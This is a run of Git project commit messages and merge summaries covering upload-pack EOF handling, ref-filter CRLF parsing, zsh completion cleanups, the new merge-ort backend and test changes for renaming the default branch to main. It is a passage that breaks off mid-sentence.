Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow callers to specify the repository to use. Rename the function to
repo_clear_commit_marks to document its new scope. No functional change
intended.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During stateless packfile negotiation where a depth is given, stateless
RPC clients (e.g. git-remote-curl) will send multiple upload-pack
requests with the first containing only the
wants/shallows/deepens/filters and the subsequent containing haves/done.
When upload-pack handles such requests, entering get_common_commits
without checking whether the client has hung up can result in unexpected
EOF during the negotiation loop and a die() with message "fatal: the
remote end hung up unexpectedly".
Real world effects include:
- A client speaking to git-http-backend via a server that doesn't check
the exit codes of CGIs (e.g. mod_cgi) doesn't know and doesn't care
about the fatal. It continues to process the response body as normal.
- A client speaking to a server that does check the exit code and
returns an errant HTTP status as a result will fail with the message
"error: RPC failed; HTTP 500 curl 22 The requested URL returned error:
500."
- Admins running servers that surface the failure must workaround it by
patching code that handles execution of git-http-backend to ignore exit
codes or take other heuristic approaches.
- Admins may have to deal with "hung up unexpectedly" log spam related
to the failures even in cases where the exit code isn't surfaced as an
HTTP server-side error status.
To avoid these EOF related fatals, have upload-pack gently peek for an
EOF between the sending of shallow/unshallow lines (followed by flush)
and the reading of client haves. If the client has hung up at this
point, exit normally.
Signed-off-by: Daniel Duvall <dan@mutual.io>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
GitHub Actions automated test improvement to skip tests on a tree
identical to what has already been tested.
* js/ci-ghwf-dedup-tests:
ci: make the "skip-if-redundant" check more defensive
ci: work around old records of GitHub runs
"git resurrect" script (in contrib/) learned that the object names
may be longer than 40-hex depending on the hash function in use.
* dl/resurrect-update-for-sha256:
contrib/git-resurrect.sh: use hash-agnostic OID pattern
contrib/git-resurrect.sh: indent with tabs
Micro clean-up.
* cm/t7xxx-cleanup:
t7102: prepare expected output inside test_expect_* block
t7201: put each command on a separate line
t7201: use 'git -C' to avoid subshell
t7102,t7201: remove whitespace after redirect operator
t7102,t7201: remove unnecessary blank spaces in test body
t7101,t7102,t7201: modernize test formatting
In 2.29, "--committer-date-is-author-date" option of "rebase" and
"am" subcommands lost the e-mail address by mistake, which has been
corrected.
* jk/committer-date-is-author-date-fix:
rebase: fix broken email with --committer-date-is-author-date
am: fix broken email with --committer-date-is-author-date
t3436: check --committer-date-is-author-date result more carefully
Add a new test-tool command named 'fast-rebase', which is a
super-slimmed down and nowhere near as capable version of 'git rebase'.
'test-tool fast-rebase' is not currently planned for usage in the
testsuite, but is here for two purposes:
1) Demonstrate the desired API of merge-ort. In particular,
fast-rebase takes advantage of the separation of the merging
operation from the updating of the index and working tree, to
allow it to pick N commits, but only update the index and working
tree once at the end. Look for the calls to
merge_incore_nonrecursive() and merge_switch_to_result().
2) Provide a convenient benchmark that isn't polluted by the heavy
disk writing and forking of unnecessary processes that comes from
sequencer.c and merge-recursive.c. fast-rebase is not meant to
replace sequencer.c, just give ideas on how sequencer.c can be
changed. Updating sequencer.c with these goals is probably a
large amount of work; writing a simple targeted command with
no documentation, less-than-useful help messages, numerous
limitations in terms of flags it can accept and situations it can
handle, and which is flagged off from users is a much easier
interim step.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A previous commit adjusted the code in ref-filter.c so that messages
containing CRLF are now correctly parsed and displayed.
Add tests to also check that `git log` and `git show` correctly handle
such messages, to prevent futur regressions if these commands are
refactored to use the ref-filter API.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ref-filter code does not correctly handle commit or tag messages
that use CRLF as the line terminator. Such messages can be created with
the `--cleanup=verbatim` option of `git commit` and `git tag`, or by
using `git commit-tree` directly.
The function `find_subpos` in ref-filter.c looks for two consecutive
LFs to find the end of the subject line, a sequence which is absent in
messages using CRLF. This results in the whole message being parsed as
the subject line (`%(contents:subject)`), and the body of the message
(`%(contents:body)`) being empty.
Moreover, in `copy_subject`, which wants to return the subject as a
single line, '\n' is replaced by space, but '\r' is
untouched.
This impacts the output of `git branch`, `git tag` and `git
for-each-ref`.
This behaviour is a regression for `git branch --verbose`, which
bisects down to 949af0684c (branch: use ref-filter printing APIs,
2017-01-10).
Adjust the ref-filter code to be more lenient by hardening the logic in
`copy_subject` and `find_subpos` to correctly parse messages containing
CRLF.
Add a new test script, 't3920-crlf-messages.sh', to test the behaviour
of commands using either the ref-filter or the pretty APIs with messages
using CRLF line endings. The function `test_crlf_subject_body_and_contents`
can be used to test that the `--format` option of `branch`, `tag`,
`for-each-ref`, `log` and `show` correctly displays the subject, body
and raw content of commit and tag messages using CRLF. Test the
output of `branch`, `tag` and `for-each-ref` with such commits.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In demultiplex_sideband(), there are two oddities when we check an
incoming packet:
- if it has zero length, then we assume it's a flush packet. This
means we fail to notice the difference between a real flush and a
true zero-length packet that's missing its sideband designator. It's
not a huge problem in practice because we'd never send a zero-length
data packet (even our keepalives are otherwise-empty sideband-1
packets).
But it would be nice to detect and report the error, since it's
likely to cause other confusion (we think the other side flushed,
but they do not).
- we try to detect packets missing their designator by checking for
"if (len < 1)". But this will never trigger for "len == 0"; we've
already detected that and left the function before then.
It _could_ detect a negative "len" parameter. But in that case, the
error message is wrong. The issue is not "no sideband" but rather
"eof while reading the packet". However, this can't actually be
triggered in practice, because neither of the two callers uses
pkt_read's GENTLE_ON_EOF flag. Which means they'd die with "the
remote end hung up unexpectedly" before we even get here.
So this truly is dead code.
We can improve these cases by passing in a pkt-line status to the
demultiplexer, and by having recv_sideband() use GENTLE_ON_EOF. This
gives us two improvements:
- we can now reliably detect flush packets, and will report a normal
packet missing its sideband designator as an error
- we'll report an eof with a more detailed "protocol error: eof while
reading sideband packet", rather than the generic "the remote end
hung up unexpectedly"
- when we see an eof, we'll flush the sideband scratch buffer, which
may provide some hints from the remote about why they hung up
(though note we already flush on newlines, so it's likely that most
such messages already made it through)
In some sense this patch goes against fbd76cd450 (sideband: reverse its
dependency on pkt-line, 2019-01-16), which caused the sideband code not
to depend on the pkt-line code. But that commit was really just trying
to deal with the circular header dependency. The two modules are
conceptually interlinked, and it was just trying to keep things
compiling. And indeed, there's a sticking point in this patch: because
pkt-line.h includes sideband.h, we can't add the reverse include we need
for the sideband code to have an "enum packet_read_status" parameter.
Nor can we forward declare it, because you can't forward declare an enum
in C. However, C does guarantee that enums fit in an int, so we can just
use that type.
One alternative would be for the callers to check themselves that they
got something sane from the pkt-line code. But besides duplicating
logic, this gets quite tricky. Any error condition requires flushing the
sideband #2 scratch buffer, which only demultiplex_sideband() knows how
to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A lot of people are confused about which completion script they are
using; Zsh's Git script, or Git's Zsh script.
Add a simple helper so they can type 'git zsh<tab>' and find out if they
are running the correct one: this.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no need to use _alternative and repeat a lot of the code.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's exactly the same as __gitcomp_nl(), no need to duplicate code.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of manually removing the suffix so zsh can add its own, we can
tell zsh to add no suffix, so we don't have to remove it.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't need to override IFS, zsh has a native way of splitting by new
lines: the expansion flag (f).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't want to override the 'complete()' function in zsh, which can be
used by bashcomp.
Reported-by: Mark Lodato <lodato@google.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was introduced in upstream's bash script, but never in zsh's:
b221b5ab9b (completion: collapse extra --no-.. options)
It has been failing since v2.19.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It has been deprecated for more than eight years now, it's never up to
date, and it's a hassle to maintain.
It's time to move on.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A lot of people want to define aliases like gc='git commit', and zsh
allows that (when not using 'complete_aliases'), but we need to handle
services that call a function other than the main one.
With this patch we can do:
compdef _git gc=git_commit
Additionally, add compatibility for Zsh Git functions which have the
form git-commit (with dash, not underscore).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't need PROMPT_COMMAND in Zsh; we are already using %F{color} %f,
which in turn use %{ and %}, which are the equivalent of Bash's
\[ and \].
We can use as many colors as we want and output directly into PS1
(or RPS1) without the risk of buffer wrapping issues.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the default locations of typical system bash-completion,
including the default bash-completion location for user scripts, and the
recommended way to find the system location (with pkg-config).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git checkout" learned to use checkout.guess configuration variable
and enable/disable its "--[no-]guess" option accordingly.
* dl/checkout-guess:
checkout: learn to respect checkout.guess
Documentation/config/checkout: replace sq with backticks
"git checkout -p A...B [-- <path>]" did not work, even though the
same command without "-p" correctly used the merge-base between
commits A and B.
* dl/checkout-p-merge-base:
t2016: add a NEEDSWORK about the PERL prerequisite
add-patch: add NEEDSWORK about comparing commits
Doc: document "A...B" form for <tree-ish> in checkout and switch
builtin/checkout: fix `git checkout -p HEAD...` bug
"git clone" learned clone.defaultremotename configuration variable
to customize what nickname to use to call the remote the repository
was cloned from.
* sb/clone-origin:
clone: allow configurable default for `-o`/`--origin`
clone: read new remote name from remote_name instead of option_origin
clone: validate --origin option before use
refs: consolidate remote name validation
remote: add tests for add and rename with invalid names
clone: use more conventional config/option layering
clone: add tests for --template and some disallowed option pairs
"git push --force-with-lease[=<ref>]" can easily be misused to lose
commits unless the user takes good care of their own "git fetch".
A new option "--force-if-includes" attempts to ensure that what is
being force-pushed was created after examining the commit at the
tip of the remote ref that is about to be force-replaced.
* sk/force-if-includes:
t, doc: update tests, reference for "--force-if-includes"
push: parse and set flag for "--force-if-includes"
push: add reflog check for "--force-if-includes"
"git worktree list" now shows if each worktree is locked. This
possibly may open us to show other kinds of states in the future.
* rs/worktree-list-show-locked:
worktree: teach `list` to annotate locked worktree
Use "git archive" more to produce the release tarball.
* rs/dist-doc-with-git-archive:
Makefile: remove the unused variable TAR_DIST_EXTRA_OPTS
Makefile: use git init/add/commit/archive for dist-doc
If we encounter an error while checking out an explicit path, we print a
message to stderr but do not actually exit with a non-zero code. While
this is a plumbing command and the behavior goes all the way back to
33db5f4d90 (Add a "checkout-cache" command which does what the name
suggests., 2005-04-09), this is almost certainly an oversight:
- we _do_ return an exit code from checkout_file(); the caller just
never reads it
- errors while checking out all paths (with "-a") do result in a
non-zero exit code.
- it would be quite unusual not to use the exit code for an error,
as otherwise the caller has no idea the command failed except by
scraping stderr
To keep our tests simple and portable, we can use the most obvious
error: asking to checkout a path which is not in the index at all.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If checkout-index is given --stage=all for a specific path, it will try
to write stages 1-3 (if present) for that path to temporary files.
However, if the file is present only at stage 0, it writes nothing but
gives a confusing message:
$ git checkout-index --stage=all -- Makefile
git checkout-index: Makefile does not exist at stage 4
This is nonsense. There is no stage 4 (it's just an internal enum value
we use for "all"), and the documentation clearly states:
Paths which only have a stage 0 entry will always be omitted from the
output.
Here it's talking about the list of tempfiles written to stdout, but it
seems clear that this case was not meant to be an error. We even have a
test which covers it, but it only checks that the command reports an
exit code of 0, not its stderr. And it reports 0 only because of another
bug which fails to propagate errors (which will be fixed in a subsequent
patch).
So let's make the test more thorough. We'll also cover the case that we
found _no_ entry, not even a stage zero, which should still be an error.
However, because of the other bug, we'll have to mark this as expecting
failure for the moment.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We pass "sideband: " as our identity for errors to recv_sideband(). But
it already adds the trailing colon and space. This doesn't invalidate
any tests, but it looks funny when you examine the test output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the exit code for the likes of "git remote add/rename" to exit
with 2 if the remote in question doesn't exist, and 3 if it
does. Before we'd just die() and exit with the general 128 exit code.
This changes the output message from e.g.:
fatal: remote origin already exists.
To:
error: remote origin already exists.
Which I believe is a feature, since we generally use "fatal" for the
generic errors, and "error" for the more specific ones with a custom
exit code, but this part of the change may break code that already
relies on stderr parsing (not that we ever supported that...).
The motivation for this is a discussion around some code in GitLab's
gitaly which wanted to check this, and had to parse stderr to do so:
https://gitlab.com/gitlab-org/gitaly/-/merge_requests/2695
It's worth noting as an aside that a method of checking this that
doesn't rely on that is to check with "git config" whether the value
in question does or doesn't exist. That introduces a TOCTOU race
condition, but on the other hand this code (e.g. "git remote add")
already has a TOCTOU race.
We go through the config.lock for the actual setting of the config,
but the pseudocode logic is:
read_config();
check_config_and_arg_sanity();
save_config();
So e.g. if a sleep() is added right after the remote_is_configured()
check in add() we'll clobber remote.NAME.url, and add another (usually
duplicate) remote.NAME.fetch entry (and other values, depending on
invocation).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are a few differences between the new API in merge-ort and the old
API in merge-recursive. While the new API is more flexible, it might
feel like more work at times than the old API. merge-ort-wrappers
creates two convenience wrappers taking the exact same arguments as the
old merge_trees() and merge_recursive() functions and implements them
via the new API. This makes converting existing callsites easier, and
serves to highlight some of the differences in the API.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is the beginning of a new merge strategy. While there are some API
differences, and the implementation has some differences in behavior, it
is essentially meant as an eventual drop-in replacement for
merge-recursive.c. However, it is being built to exist side-by-side
with merge-recursive so that we have plenty of time to find out how
those differences pan out in the real world while people can still fall
back to merge-recursive. (Also, I intend to avoid modifying
merge-recursive during this process, to keep it stable.)
The primary difference noticable here is that the updating of the
working tree and index is not done simultaneously with the merge
algorithm, but is a separate post-processing step. The new API is
designed so that one can do repeated merges (e.g. during a rebase or
cherry-pick) and only update the index and working tree one time at the
end instead of updating it with every intermediate result. Also, one
can perform a merge between two branches, neither of which match the
index or the working tree, without clobbering the index or working tree.
The next three commits will demonstrate various uses of this new API.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This benchmark covers the git status time for a heavily
dirty directory - benchmarking fsmonitor's refresh
When running to compare our perl vs rs-git-fsmonitor - we see that
the perl script incurs significant overhead - further motivation
to provide a faster implementation within git.
7519.7: status (dirty) (fsmonitor=query-watchman) 10.05(7.78+1.56)
7519.20: status (dirty) (fsmonitor=rs-git-fsmonitor) 6.72(4.37+1.64)
7519.33: status (dirty) (fsmonitor=disabled) 5.62(4.24+2.03)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This prepares for it being called multiple times when
testing different hooks
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is extremely verbose, printing >10K non-useful lines
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The full name is lengthy and makes it hard to read
Before:
7519.3: status (fsmonitor=/home/nipunn/src/server/.git/hooks/rs-git-fsmonitor) 0.02(0.01+0.00)
After
7519.3: status (fsmonitor=rs-git-fsmonitor) 0.03(0.02+0.00)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There was much duplication here. Prepares for making
changes to the description.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously - it would silently run the perf suite w/o using
fsmonitor - fsmonitor errors are not hard failures.
Now it errors loudly.
GIT_PERF_7519_FSMONITOR="$HOME/rs-git-fsmonitorr"
./p7519-fsmonitor.sh -i -v
fatal: cannot run /home/nipunn/rs-git-fsmonitorr:
No such file or directory
not ok 2 - setup for fsmonitor
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is only required to be set up once. This prepares for
testing multiple hooks in one invocation.
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for testing multiple fsmonitor hooks
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Start with the most important thing; the proper location of this script,
then follow with the location of the slave script (git-completion.bash).
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 0e5ed7cca3 wrongly changed the extension of the bash script
to .zsh; the zstyle configuration is for the slave script (bash), not
the master one (zsh).
For example it could be:
zstyle ':completion:*:**' script ~/.git-completion.bash
The extension doesn't really matter, but it confuses people into
thinking it's a zsh script; it's not.
Cc: Peter van der Does <peter@avirtualhome.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many callers append a space suffix, but zsh automatically appends a
space, making the completion add two spaces, for example:
git log ma<tab>
Will complete 'master '.
Let's remove that extra space.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 2.29, "--committer-date-is-author-date" option of "rebase" and
"am" subcommands lost the e-mail address by mistake, which has been
corrected.
* jk/committer-date-is-author-date-fix:
rebase: fix broken email with --committer-date-is-author-date
am: fix broken email with --committer-date-is-author-date
t3436: check --committer-date-is-author-date result more carefully
Similar to the previous commit, since the "recursive" backend relies on
unpack_trees() to check if unstaged or untracked files would be
overwritten by a merge, and unpack_trees() does not understand renames
-- it has false positives and false negatives. Once it has run, since
it updates as it goes, merge-recursive then has to handle completing the
merge as best it can despite extra changes in the working copy.
However, this is not just an issue for dirty files, but also for
untracked files because directory renames can cause file contents to
need to be written to a location that was not tracked on either side of
history.
Since the "ort" backend does the complete merge inmemory, and only
updates the index and working copy as a post-processing step, if there
are untracked files in the way it can simply abort the merge much like
checkout does.
Update t6423 to reflect the better merge abilities and expectations for
ort, while still leaving the best-case-as-good-as-recursive-can-do
expectations there for the recursive backend so we retain its stability
until we are ready to deprecate and remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "recursive" backend relies on unpack_trees() to check if unstaged
changes would be overwritten by a merge, but unpack_trees() does not
understand renames -- and once it returns, it has already written many
updates to the working tree and index. As such, "recursive" had to do a
special 4-way merge where it would need to also treat the working copy
as an extra source of differences that we had to carefully avoid
overwriting and resulting in moving files to new locations to avoid
conflicts.
The "ort" backend, by contrast, does the complete merge inmemory, and
only updates the index and working copy as a post-processing step. If
there are dirty files in the way, it can simply abort the merge.
Update t6423 and t6436 to reflect the better merge abilities and
expectations we have for ort, while still leaving the
best-case-as-good-as-recursive-can-do expectations there for the
recursive backend so we retain its stability until we are ready to
deprecate and remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ort merge strategy has some slight differences in commit
descriptions (shortened hashes), stdout vs stderr, and in conflict
messages. Also, builtin/merge.c reports usage of "ort" as "Merge made
by the 'ort' strategy" -- while it is meant as a drop in replacement for
"recursive" it is not yet treated as though it is recursive. Update the
testcases to expect different output for the different merge backends.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Conflict markers carry an extra annotation of the form
REF-OR-COMMIT:FILENAME
to help distinguish where the content is coming from, with the :FILENAME
piece being left off if it is the same for both sides of history (thus
only renames with content conflicts carry that part of the annotation).
However, there were cases where the :FILENAME annotation was
accidentally left off, due to merge-recursive's
every-codepath-needs-a-copy-of-all-special-case-code format.
Update a few tests to have the correct :FILENAME extension on relevant
paths with the ort backend, while leaving the expectation for
merge-recursive the same to avoid destabilizing it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a file is renamed and has content conflicts, merge-recursive does
not have some stages for the old filename and some stages for the new
filename in the index; instead it copies all the stages corresponding to
the old filename over to the corresponding locations for the new
filename, so that there are three higher order stages all corresponding
to the new filename. Doing things this way makes it easier for the user
to access the different versions and to resolve the conflict (no need to
manually 'git rm' the old version as well as 'git add' the new one).
rename/deletes should be handled similarly -- there should be two stages
for the renamed file rather than just one. We do not want to
destabilize merge-recursive right now, so instead update relevant tests
to have different expectations depending on whether the "recursive" or
"ort" merge strategies are in use.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When files are renamed and modified, we need to do three-way content
merges to get the appropriate content in the right location. When we
have a rename/rename(1to2) conflict (both sides rename the same file,
but differently), that merged content should be placed in each of the
two resulting files. merge-recursive handled that fine when that was
all that was involved, but when one or more of the two resulting files
were ALSO involved in a directory/file conflict, it failed to propagate
the merged content to that file. Unfortunately, the one test in t6416
that touched on this combination of cases had been coded to not expect
the merged contents to be present.
Fix the test to check for the right behavior, and record how the
different merge backends will be expected to handle it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-recursive.c is built on the idea of running unpack_trees() and
then "doing minor touch-ups" to get the result. Unfortunately,
unpack_trees() was run in an update-as-it-goes mode, leading
merge-recursive.c to follow suit and end up with an immediate evaluation
and fix-it-up-as-you-go design. Some things like directory/file
conflicts are not well representable in the index data structure, and
required special extra code to handle. But then when it was discovered
that rename/delete conflicts could also be involved in directory/file
conflicts, the special directory/file conflict handling code had to be
copied to the rename/delete codepath. ...and then it had to be copied
for modify/delete, and for rename/rename(1to2) conflicts, ...and yet it
still missed some. Further, when it was discovered that there were also
file/submodule conflicts and submodule/directory conflicts, we needed to
copy the special submodule handling code to all the special cases
throughout the codebase.
And then it was discovered that our handling of directory/file conflicts
was suboptimal because it would create untracked files to store the
contents of the conflicting file, which would not be cleaned up if
someone were to run a 'git merge --abort' or 'git rebase --abort'. It
was also difficult or scary to try to add or remove the index entries
corresponding to these files given the directory/file conflict in the
index. But changing merge-recursive.c to handle these correctly was a
royal pain because there were so many sites in the code with similar but
not identical code for handling directory/file/submodule conflicts that
would all need to be updated.
I have worked hard to push all directory/file/submodule conflict
handling in merge-ort through a single codepath, and avoid creating
untracked files for storing tracked content (it does record things at
alternate paths, but makes sure they have higher-order stages in the
index).
Since updating merge-recursive is too much work and we don't want to
destabilize it, instead update the testsuite to have different
expectations for relevant directory/file/submodule conflict tests.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are a number of tests that the "recursive" backend does not handle
correctly but which the redesign in "ort" will. Add a new helper in
lib-merge.sh for selecting a different test expectation based on the
setting of GIT_TEST_MERGE_ALGORITHM, and use it in various testcases to
document which ones we expect to fail under recursive but pass under
ort.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For the --committer-date-is-author-date option of git-am and git-rebase,
we format the committer ident, then re-parse it to find the name and
email, and then feed those back to fmt_ident().
We can simplify this by handling it all at the time of the fmt_ident()
call. We pass in the appropriate getenv() results, and if they're not
present, then our WANT_COMMITTER_IDENT flag tells fmt_ident() to fill in
the appropriate value from the config. Which is exactly what
git_committer_ident() was doing under the hood.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the trivial search-and-replace, there are three
non-trivial adjustments necessary.
Mark the respective test cases with the transitional prereq and make
those non-trivial adjustments early, to make this change easier to
review.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In some tests, the default branch name is part of aligned output. As we
want to change the default branch name to `main`, which is two
characters shorter than the old default branch name, we will have to
adjust those tests.
Since we use the original default branch name until the entire test
suite has been adjusted accordingly, the touched test cases need to be
guarded by a prereq (that is so far disabled so that they are skipped
for now).
The test cases that depend on those test cases that are newly guarded by
that prereq naturally have to be guarded, too.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We need to adjust a test that uses a prefix of the default branch name,
to accommodate for `main` being used soon.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the test case adjusted by this patch, we want to cut just after the
longest shown ref name. Since `main` is shorter than `master`, we need
to decrease the number of characters. Since `topic` is shown, too, and
since that is only one character shorter than `master`, we decrement the
length by one instead of two.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to rename the default branch name used by `git init` in the near
future, using `main` as the new name.
In preparation for that, we adjust a test case that wants to rename the
default branch to a different name that however has the same length. We
use `none` as that name because it matches the length of `main`.
As this test case cannot possibly pass until the default branch name is
_actually_ changed, we temporarily guard it behind a special-purpose
prereq, until the test suite is fully converted to use that new default
branch name.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation to running t6200 with the default branch name set to
"main", let's adjust the only non-trivial aspect thereof. The rest will
be done via a trivial `sed` invocation.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow for an incremental conversion to a new default main branch
name, let's introduce `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME`. This
environment variable can be set at the top of each converted test
script, overriding the default main branch name to use when initializing
new repositories (or cloning empty repositories).
Note: the `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME` is _not_ intended to be
used manually; many tests require a specific main branch name and cannot
simply work with another one. This `GIT_TEST_*` variable is meant purely
for the transitional period while the entire test suite is converted to
use `main` as the initial branch name by default.
We also introduce the `PREPARE_FOR_MAIN_BRANCH` prereq that determines
whether the default main branch name is `main`, and adjust a couple of
test functions to use it. This prereq will be used to temporarily
disable a couple test cases to allow for adjusting the test script
incrementally. Once an entire test is adjusted, we will adjust the test
so that it is run with `GIT_TEST_DEFAULT_MAIN_BRANCH_NAME=main`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Seeing as we want to use `main` as the new default branch name used by
`git init`, and that `main` is used as directory name in t9801, let's
tighten the rev-list arguments to make it explicit when we are referring
to a ref instead of a directory.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for changing the default branch name to `main`, let's
skip the suffix "into main" in merge commit messages, the same way that
"into master" has been skipped by default.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 7573cec52c (rebase -i: support --committer-date-is-author-date,
2020-08-17) copied the committer ident-parsing code from builtin/am.c.
And in doing so, it copied a bug in which we always set the email to an
empty string. We fixed the version in git-am in the previous commit;
this commit fixes the copied code.
Reported-by: VenomVendor <info@venomvendor.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit e8cbe2118a (am: stop exporting GIT_COMMITTER_DATE, 2020-08-17)
rewrote the code for setting the committer date to use fmt_ident(),
rather than setting an environment variable and letting commit_tree()
handle it. But it introduced two bugs:
- we use the author email string instead of the committer email
- when parsing the committer ident, we used the wrong variable to
compute the length of the email, resulting in it always being a
zero-length string
This commit fixes both, which causes our test of this option via the
rebase "apply" backend to now succeed.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After running "rebase --committer-date-is-author-date", we confirm that
the committer date is the same as the author date. However, we don't
look at any other parts of the committer ident line to make sure we
didn't screw them up. And indeed, there are a few bugs here. Depending
on the rebase backend in use, we may accidentally use the author email
instead of the committer's, or even an empty string.
Let's teach our test_ctime_is_atime helper to check the committer name
and email, which reveals several failing tests.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That way we can notice if there is a breakage/bug in the parts of
the test that prepare the expected outcome, which is how modern
tests are arranged.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern practice is to avoid multiple commands per line,
and instead place each command on its own line.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, redirect
operator is written with space before, but no space
after them.
Let's remove these whitespaces after redirect operators.
Signed-off-by: Charvi Mendiratta <charvi077@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Support POSIX, bashism and mixed function declarations, all four
compound command types, trailing comments and mixed whitespace.
Even though Bash allows locale-dependent characters in function names
